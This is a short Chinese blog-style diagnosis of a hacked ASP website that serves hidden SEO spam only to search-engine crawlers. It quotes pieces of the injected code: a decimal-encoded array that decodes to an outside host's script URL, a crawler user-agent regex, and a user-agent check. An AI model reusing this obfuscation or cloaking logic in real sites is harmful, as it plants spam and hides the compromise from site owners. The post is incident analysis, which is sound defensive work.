患者:某单位某二级部门网站
症状:正常访问无大碍,百度快照访问页面中杂有不可描述之内容。
其他症状:主机win server 2003,ASP,ACCESS,密码明文,登陆日志黑点满满。
病症:User-Agent伪装成Baiduspider虫,访问到被篡改页面;正常访问,正常显示(扫描设备成摆设-_-!!!)。由上推断被植入SEO黑链无疑了。
伪处方:这样的server,这样的网站,修修上线算了
1、尝试不同的UserAgent,当UserAgent中包含baidu、spider、360、so、yahoo、google关键字时,问题依旧(=_=!!,有些‘归化’引擎bing不能入眼)。
2、显然是网站后台被插入了恶意代码所致,逻辑该是接收到访问请求后,先判断UserAgent中是否包含上述关键字,若包含则将不可描述内容加入到页面中。在网站后台文件中查找包含Agent关键字的文件,无果;继而查找关键字(baidu,spider,360...),依然无果~~~
3、根据篡改页面手动排查,找到一段:cft=array(104,116,116,112,58,47,47,101,46,102,105,97,107,99,46,105,110,58,53,47,99,102,46,116,120,116)
4、asii码,转换,来了个http地址,http://e.fiakc.in:5/cf.txt, 打开,瞅到这段万恶之源。
Dim robots:robots="aidu|oogle|ia_arch|snbot|ahoo|so|haosou|spider"
l1=request.servervariables("http_user_agent")
网友评论